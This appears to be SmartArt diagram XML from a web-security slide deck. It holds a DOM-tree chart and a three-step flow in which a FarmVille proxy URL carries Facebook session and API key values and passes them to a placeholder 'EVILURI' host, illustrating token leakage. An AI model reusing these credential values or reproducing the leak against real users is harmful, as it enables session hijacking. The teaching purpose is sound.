    <dgm:cxn modelId="{12F4F783-D6D2-49F1-8A14-DF86F1C42B20}" type="presParOf" srcId="{67745D4A-37EC-4767-BE23-05FE64519AA5}" destId="{50DA6FA3-BEBA-458C-A15A-AB95FF4B97FB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{76C90D91-E619-4249-BB5F-A2A8B9C83EFC}" type="presParOf" srcId="{50DA6FA3-BEBA-458C-A15A-AB95FF4B97FB}" destId="{34FAECD8-F2EF-4C0E-92F3-7D0D8C9A874E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{CB5E3A99-BCC3-47D1-88DD-65F715CFE680}" type="presParOf" srcId="{34FAECD8-F2EF-4C0E-92F3-7D0D8C9A874E}" destId="{616A8C5F-C18C-45A0-B480-726A5E1F4076}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{4D279DE1-D663-4D3E-A1FA-A605B788A8D9}" type="presParOf" srcId="{34FAECD8-F2EF-4C0E-92F3-7D0D8C9A874E}" destId="{D957EC5F-5833-4B25-8FC8-16A94044562F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{23E029F9-47CF-4FF9-A342-5188F1545BBB}" type="presParOf" srcId="{50DA6FA3-BEBA-458C-A15A-AB95FF4B97FB}" destId="{28609EFA-7485-449D-9195-A5DD815CE94B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{CCEE4A68-5928-40E8-80CF-08D125088F5E}" type="presParOf" srcId="{50DA6FA3-BEBA-458C-A15A-AB95FF4B97FB}" destId="{0AEEF1AB-D6FA-4D86-BE4F-3C130FAD5F47}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{DDDDCBF6-FB69-40B4-995B-D86459DE23B9}" type="presParOf" srcId="{7B35274B-5AA2-468C-B78D-48BDE2747975}" destId="{EF8C061E-F9C9-4EF9-B271-77B880E59FAF}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{73473F26-0D6E-44A2-8749-22D99DD8C5D2}" type="presParOf" srcId="{1D63D1B8-5B0C-48DC-A00E-F9D836C14EA5}" destId="{9E379C27-DF8B-41C5-9552-FE86474CCC3E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{E70C7BE2-1ECD-4021-AEFF-1548E432CF93}" type="presParOf" srcId="{063F83F3-DF48-48DE-88E7-C7E6C5FBF140}" destId="{76520D3A-5F77-4BF1-9909-AC35C8BBA2F9}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{BF10B05B-CFCD-477D-9269-F7E611AFF963}" type="presParOf" srcId="{E5AEBF46-E486-461A-8DCC-EC626076DFC6}" destId="{BB6C2CF6-F566-487F-91F0-2853677D44C0}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{4E8D9663-FAB7-417E-9A09-C3F51E5E79D2}" type="presParOf" srcId="{7672F39C-9712-4011-8070-343FFB1F5CB7}" destId="{22151242-383C-48D0-B69E-7BF86EEA49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B6A8E-BBDE-419E-817A-73499BCC8FBA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59D77F-117D-4C5E-BD9C-75D719A431A1}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t> http://apps.facebook.com/onthefarm/index.php?type=...</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F65EDA2D-98BF-4FD8-A4AA-979FB3FE59ED}" type="parTrans" cxnId="{89DE9238-8269-4D6E-85BD-013D56349D2C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7A0F9271-005E-45AB-B8A8-B34819FDA6DE}" type="sibTrans" cxnId="{89DE9238-8269-4D6E-85BD-013D56349D2C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CC0598D-66C0-47F7-B3DE-DC2F483246E8}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t> http://fbpr1-proxy.farmville.zynga.com/current/index.php?type=...</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t> &amp;</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>fb_sig_user</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>=1077687516</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t> &amp;</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>fb_sig_session_key</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>=</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" spc="-110" baseline="0" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>2.RUylEaZ4VgDp9xJ8HpHcrQ__.3600.1271307600-1077687516</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t/>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t> &amp;</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>fb_sig_ss</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>=RUylEaZ4VgDp9xJ8HpHcrQ__</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t> &amp;</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>fb_sig_api_key</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>=80c6ec6628efd9a465dd223190a65bbc</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t> &amp;</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>fb_sig</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>_...</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7FAA5538-D166-456E-A3BC-B03658D774A7}" type="parTrans" cxnId="{1E79E46E-EF04-48E7-B962-9D327A6B4CD4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5ED5D208-B6D4-47A5-A4ED-54972574DF64}" type="sibTrans" cxnId="{1E79E46E-EF04-48E7-B962-9D327A6B4CD4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F576A52-89A3-42B0-9248-93E227E3A2A8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onsolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t> http://EVILURI/</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AAD08972-8826-4885-A372-0F3591F0401A}" type="parTrans" cxnId="{6857796A-18BF-4C7D-96E8-39BCE1C4B155}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EA468C6B-109A-4E94-A937-9CC74803F467}" type="sibTrans" cxnId="{6857796A-18BF-4C7D-96E8-39BCE1C4B155}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D5DB02FD-BFDB-4D9F-B349-AD23ADF7BF65}" type="pres">
      <dgm:prSet presAssocID="{BA5B6A8E-BBDE-419E-817A-73499BCC8FB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D9BE2-3FCE-4326-A51F-9E4E5DD94EB2}" type="pres">
      <dgm:prSet presAssocID="{BA5B6A8E-BBDE-419E-817A-73499BCC8FBA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8FA2F73A-5B84-49E6-8CFC-F7DB655DC098}" type="pres">
      <dgm:prSet presAssocID="{BA5B6A8E-BBDE-419E-817A-73499BCC8FBA}" presName="ThreeNodes_1" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3" custLinFactNeighborX="-1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B2B02-E256-4C8D-9278-454CA7DACCD2}" type="pres">
      <dgm:prSet presAssocID="{BA5B6A8E-BBDE-419E-817A-73499BCC8FB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C8B0C-0B79-4F34-B9DE-50AC176B0366}" type="pres">
      <dgm:prSet presAssocID="{BA5B6A8E-BBDE-419E-817A-73499BCC8FB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531A1-0615-4C86-8FF4-A150B1D87772}" type="pres">
      <dgm:prSet presAssocID="{BA5B6A8E-BBDE-419E-817A-73499BCC8FB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E6A67-3134-4C25-BB0E-5AB01B5A6A8D}" type="pres">
      <dgm:prSet presAssocID="{BA5B6A8E-BBDE-419E-817A-73499BCC8FB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5B077-27E7-4328-BF3E-771B2519B4F5}" type="pres">
      <dgm:prSet presAssocID="{BA5B6A8E-BBDE-419E-817A-73499BCC8FB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9447E-2F68-4BE3-B602-8B3A529C291F}" type="pres">
      <dgm:prSet presAssocID="{BA5B6A8E-BBDE-419E-817A-73499BCC8FB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7B5C0-313F-41F9-80B0-BB498748C9DC}" type="pres">
      <dgm:prSet presAssocID="{BA5B6A8E-BBDE-419E-817A-73499BCC8FB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1573CB-55B4-4871-8664-4B88B0A9B126}" type="presOf" srcId="{5ED5D208-B6D4-47A5-A4ED-54972574DF64}" destId="{4F5E6A67-3134-4C25-BB0E-5AB01B5A6A8D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{1E79E46E-EF04-48E7-B962-9D327A6B4CD4}" srcId="{BA5B6A8E-BBDE-419E-817A-73499BCC8FBA}" destId="{1CC0598D-66C0-47F7-B3DE-DC2F483246E8}" srcOrd="1" destOrd="0" parTransId="{7FAA5538-D166-456E-A3BC-B03658D774A7}" sibTransId="{5ED5D208-B6D4-47A5-A4ED-54972574DF64}"/>
    <dgm:cxn modelId="{89DE9238-8269-4D6E-85BD-013D56349D2C}" srcId="{BA5B6A8E-BBDE-419E-817A-73499BCC8FBA}" destId="{2859D77F-117D-4C5E-BD9C-75D719A431A1}" srcOrd="0" destOrd="0" parTransId="{F65EDA2D-98BF-4FD8-A4AA-979FB3FE59ED}" sibTransId="{7A0F9271-005E-45AB-B8A8-B34819FDA6DE}"/>
    <dgm:cxn modelId="{65F8DE98-0844-481D-BF7C-911517880996}" type="presOf" srcId="{7A0F9271-005E-45AB-B8A8-B34819FDA6DE}" destId="{391531A1-0615-4C86-8FF4-A150B1D87772}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{29168B0A-ECD5-41D5-8BC8-B764719691E5}" type="presOf" srcId="{1CC0598D-66C0-47F7-B3DE-DC2F483246E8}" destId="{139B2B02-E256-4C8D-9278-454CA7DACCD2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{38D7A9DB-E569-46D8-AC02-F8D31BF9B3EB}" type="presOf" srcId="{2859D77F-117D-4C5E-BD9C-75D719A431A1}" destId="{8FA2F73A-5B84-49E6-8CFC-F7DB655DC098}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{42D89F28-6260-4671-8760-C008D4B679FD}" type="presOf" srcId="{FF576A52-89A3-42B0-9248-93E227E3A2A8}" destId="{1E0C8B0C-0B79-4F34-B9DE-50AC176B0366}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{6857796A-18BF-4C7D-96E8-39BCE1C4B155}" srcId="{BA5B6A8E-BBDE-419E-817A-73499BCC8FBA}" destId="{FF576A52-89A3-42B0-9248-93E227E3A2A8}" srcOrd="2" destOrd="0" parTransId="{AAD08972-8826-4885-A372-0F3591F0401A}" sibTransId="{EA468C6B-109A-4E94-A937-9CC74803F467}"/>
    <dgm:cxn modelId="{130397C3-229B-4E2C-A016-3592AB808FFE}" type="presOf" srcId="{2859D77F-117D-4C5E-BD9C-75D719A431A1}" destId="{FE35B077-27E7-4328-BF3E-771B2519B4F5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{212F0CFE-A326-4FC4-84A3-0AF075EAFA9F}" type="presOf" srcId="{1CC0598D-66C0-47F7-B3DE-DC2F483246E8}" destId="{79F9447E-2F68-4BE3-B602-8B3A529C291F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{2346938C-6A37-4246-B4AF-B4E9CEF18579}" type="presOf" srcId="{BA5B6A8E-BBDE-419E-817A-73499BCC8FBA}" destId="{D5DB02FD-BFDB-4D9F-B349-AD23ADF7BF65}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{78295AA7-D338-4739-8549-F0718DD5E2AE}" type="presOf" srcId="{FF576A52-89A3-42B0-9248-93E227E3A2A8}" destId="{7B97B5C0-313F-41F9-80B0-BB498748C9DC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{EA62BFC0-751D-41FD-9B06-C823FA2EB164}" type="presParOf" srcId="{D5DB02FD-BFDB-4D9F-B349-AD23ADF7BF65}" destId="{6E9D9BE2-3FCE-4326-A51F-9E4E5DD94EB2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{82004C9E-4021-4BB3-BB88-5A6630AC4440}" type="presParOf" srcId="{D5DB02FD-BFDB-4D9F-B349-AD23ADF7BF65}" destId="{8FA2F73A-5B84-49E6-8CFC-F7DB655DC098}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{EA11511D-0549-43D4-929F-A05A615CC382}" type="presParOf" srcId="{D5DB02FD-BFDB-4D9F-B349-AD23ADF7BF65}" destId="{139B2B02-E256-4C8D-9278-454CA7DACCD2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{CDD6926C-EF5D-4E77-8BA3-3F6BF42384D4}" type="presParOf" srcId="{D5DB02FD-BFDB-4D9F-B349-AD23ADF7BF65}" destId="{1E0C8B0C-0B79-4F34-B9DE-50AC176B0366}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{6654EE3F-199B-4CBE-94DE-98D0F5ADFB24}" type="presParOf" srcId="{D5DB02FD-BFDB-4D9F-B349-AD23ADF7BF65}" destId="{391531A1-0615-4C86-8FF4-A150B1D87772}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{B5FD609D-6750-45FD-92AB-1B2A3BA14360}" type="presParOf" srcId="{D5DB02FD-BFDB-4D9F-B349-AD23ADF7BF65}" destId="{4F5E6A67-3134-4C25-BB0E-5AB01B5A6A8D}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{6B320EEC-B76C-49E3-91CA-33E26EB05766}" type="presParOf" srcId="{D5DB02FD-BFDB-4D9F-B349-AD23ADF7BF65}" destId="{FE35B077-27E7-4328-BF3E-771B2519B4F5}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{8620D712-DA8A-4FFB-91C3-66DDBB93DA42}" type="presParOf" srcId="{D5DB02FD-BFDB-4D9F-B349-AD23ADF7BF65}" destId="{79F9447E-2F68-4BE3-B602-8B3A529C291F}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{9E42DD6D-02B3-48C1-993C-97AFDAA0F25E}" type="presParOf" srcId="{D5DB02FD-BFDB-4D9F-B349-AD23ADF7BF65}" destId="{7B97B5C0-313F-41F9-80B0-BB498748C9D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E15F8C-6777-4C89-8608-418A1B988558}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2876989" y="4129131"/>
          <a:ext cx="171129" cy="524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795"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="171129" y="5247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FD4FD-0D85-442D-A8C0-B17D51455221}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1952892" y="3319120"/>
          <a:ext cx="1380441" cy="239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90"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1380441" y="119790"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1380441" y="2395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CD2B6-1B63-452C-A14E-446A8B21F053}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1907172" y="3319120"/>
          <a:ext cx="91440" cy="239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5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845C7-0557-4EAE-BFAB-F5DA45057B68}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="572451" y="3319120"/>
          <a:ext cx="1380441" cy="239580"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="1380441" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1380441" y="119790"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="119790"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="2395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3181E-2DE8-4AA5-A5B5-14715D58A57D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1262671" y="2509109"/>
          <a:ext cx="690220" cy="239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90"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="690220" y="119790"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="690220" y="2395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3E78A-6D53-4173-9DCC-16028EDF461F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="572451" y="2509109"/>
          <a:ext cx="690220" cy="239580"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="690220" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="690220" y="119790"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="119790"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="2395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CC72D-F49C-4A7F-95E5-2AAFB5E3F1CA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1216951" y="1699098"/>
          <a:ext cx="91440" cy="239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5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4A957-8B58-4A46-BE8D-C791A6143707}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1216951" y="889087"/>
          <a:ext cx="91440" cy="239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011E5-95CC-4342-A39E-9E4B57F195DD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="692241" y="318657"/>
          <a:ext cx="1140860" cy="570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window</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200" dirty="0">
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="692241" y="318657"/>
        <a:ext cx="1140860" cy="570430"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B45E7F8A-52BB-4738-983E-63D4A651EE7F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="692241" y="1128668"/>
          <a:ext cx="1140860" cy="570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document</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200" dirty="0">
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="692241" y="1128668"/>
        <a:ext cx="1140860" cy="570430"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5E4E8160-49DB-495F-9873-00DF09849E33}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="692241" y="1938679"/>
          <a:ext cx="1140860" cy="570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html</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200" dirty="0">
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="692241" y="1938679"/>
        <a:ext cx="1140860" cy="570430"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9C293A46-2823-4BA1-8B8F-77599E03F573}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2020" y="2748690"/>
          <a:ext cx="1140860" cy="570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head</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200" dirty="0">
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2020" y="2748690"/>
        <a:ext cx="1140860" cy="570430"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F5F83DD6-A8DB-4146-B161-193791C35AAF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1382462" y="2748690"/>
          <a:ext cx="1140860" cy="570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body</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200" dirty="0">
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1382462" y="2748690"/>
        <a:ext cx="1140860" cy="570430"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0C05DACF-4934-48AC-A042-B9C41658D99A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2020" y="3558701"/>
          <a:ext cx="1140860" cy="570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div</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200" dirty="0">
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2020" y="3558701"/>
        <a:ext cx="1140860" cy="570430"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C0E2A04D-0731-4CEC-A736-0E2EB57B7B34}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1382462" y="3558701"/>
          <a:ext cx="1140860" cy="570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h1</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200" dirty="0">
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1382462" y="3558701"/>
        <a:ext cx="1140860" cy="570430"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FAEB1481-FC9F-4951-8735-9ED208C766F5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2762903" y="3558701"/>
          <a:ext cx="1140860" cy="570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p</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200" dirty="0">
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2762903" y="3558701"/>
        <a:ext cx="1140860" cy="570430"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{616A8C5F-C18C-45A0-B480-726A5E1F4076}">
      <dsp:nvSpPr>
